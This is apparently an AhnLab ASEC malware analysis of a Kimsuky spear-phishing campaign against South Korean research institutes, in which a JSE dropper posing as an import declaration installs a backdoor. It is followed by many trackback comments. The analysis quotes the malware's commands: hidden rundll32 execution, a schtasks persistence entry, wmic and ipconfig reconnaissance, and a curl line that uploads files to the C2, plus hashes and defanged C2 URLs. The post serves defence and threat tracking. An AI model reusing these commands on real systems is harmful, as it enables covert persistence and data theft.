Kimsuky Targets South Korean Research Institutes with Fake Import Declaration

AhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is distributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The threat actor ultimately uses a backdoor to steal information and execute commands.

The file name of the dropper disguised as an import declaration is as follows.

  • Import Declaration_Official Stamp Affixed.jse

The file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file.

Figure 1. Obfuscated JSE file content

A legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the PowerShell script. This file contains the attack target’s information. Creating and executing a legitimate PDF file is likely done to prevent users from recognizing that a malicious backdoor file is being executed in the process.

Figure 2. Decoy file (Import Declaration.PDF)

In the background, a backdoor is created in the %ProgramData% path under the file name ‘vuVvMKg.i3IO’, and the malware is run using rundll32.exe.

  • powershell.exe -windowstyle hidden rundll32.exe ProgramData\\vuVuMKg.i3IO UpdateSystem

The malware copies itself into the %ProgramData% and %Public% paths under the file name ‘IconCache.db’ for persistence before registering itself to the task scheduler.

  • cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f

To exfiltrate system information, the backdoor uses the wmic command to check the anti-malware status of the attack target and collects network information through the ipconfig command.

  • cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt
  • ipconfig /all

Afterwards, information such as the host name, user name, and OS information is collected. For the malware to avoid detection, it encodes the command execution results and sends them to the C2.

Figure 3. Collected system information
Figure 4. Information being encoded and transmitted

Also, the following commands (including system information exfiltration) are run, behaving as a backdoor in the affected system. Additionally, the curl tool is used to upload information to the C2 server.

  • getinfo: System information
  • die: Terminate
  • where: Execution path
  • run: Run certain files and commands
  • curl -k -F “fileToUpload=@%s” -F “id=%S” %s

Because the bait file is also run, users cannot recognize that their systems are infected by malware. As these types of malware mainly attack specific targets, users should refrain from running attachments in emails sent from unknown sources.

[File Detection]

  • Dropper/JS.Generic (2023.11.16.02)
  • Backdoor/Win.Nikidoor (2023.11.15.03)

[IOC]

  • MD5
    d2335df6d17fc7c2a5d0583423e39ff8
    d6abeeb469e2417bbcd3c122c06ba099
  • C2
    hxxp://rscnode.dothome.co[.]kr/index.php
    hxxp://rscnode.dothome.co[.]kr/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

5 2 votes
Article Rating
Subscribe
Notify of
guest

46 Comments
Inline Feedbacks
View all comments
trackback

[…] Cybersecurity researchers from AhnLab Security Emergency Response Center (ASEC) have exposed this recent attack tactic by Kimsuky. The threat actor also deploys a sophisticated backdoor to steal sensitive information and execute malicious commands on the compromised systems. […]

trackback

[…] to steal info and execute instructions,» the AhnLab Safety Emergency Response Middle (ASEC) mentioned in an evaluation posted final […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) SAYS in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] to steal info and execute instructions,” the AhnLab Safety Emergency Response Middle (ASEC) said in an evaluation posted final […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an examination posted final […]

trackback

[…] exécuter des commandes », a déclaré l’AhnLab Security Emergency Response Center (ASEC). dit dans une analyse publiée la semaine […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] sonuçta bilgi çalmak ve komutları yürütmek için bir arka kapı kullanıyor” dedi. söz konusu Geçen hafta yayınlanan bir […]

trackback

[…] y ejecutar comandos», afirma el Centro de Respuesta a Emergencias de Seguridad de AhnLab (ASEC) dicho en un análisis publicado la semana […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] Il gruppo di minaccia nordcoreano noto come Kimsuky è stato osservato mentre prendeva di mira istituti di ricerca in Corea del Sud come parte di una campagna di spear-phishing, con l’obiettivo finale di distribuire backdoor sui sistemi compromessi come denunciato da AhnLab. […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] to steal info and execute instructions,” the AhnLab Safety Emergency Response Heart (ASEC) mentioned in an evaluation posted final […]

trackback

[…] to steal data and execute instructions,” the AhnLab Safety Emergency Response Heart (ASEC) mentioned in an evaluation posted final […]

trackback

[…] to steal data and execute instructions,” the AhnLab Safety Emergency Response Middle (ASEC) stated in an evaluation posted final […]

trackback

[…] information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last […]

trackback

[…] steal information and execute commands,” the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week.The attack chains commence with an import declaration lure […]

trackback

[…] Kimsuky targets South Korean research institutes with fake import declaration […]

trackback

[…] Kimsuky uzyskała zdalny dostęp do poufnych badań Korei Południowej […]

trackback

[…] “A legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the PowerShell script. This file contains the attack target’s information,” the researchers said. […]

trackback

[…] 2022, and “Kimsuky Targets South Korean Research Institutes with Fake Import Declaration” [2] uploaded in November […]

trackback

[…] the first time Korean-speaking threat actors have used this term. For instance, AhnLab’s recent report on Kimsuky mentions the following telltale command:  cmd.exe /U /c wmic […]

trackback

[…] the first time Korean-speaking threat actors have used this term. For instance, AhnLab’s recent report on Kimsuky mentions the following telltale command:  cmd.exe /U /c wmic […]

trackback

[…] امنیتی AhnLab (ASEC) طی گزارشی در سی‌اُم نوامبر ۲۰۲۳ اذعان داشت که عامل تهدید از یک بکدور برای ربودن اطلاعات و اجرای […]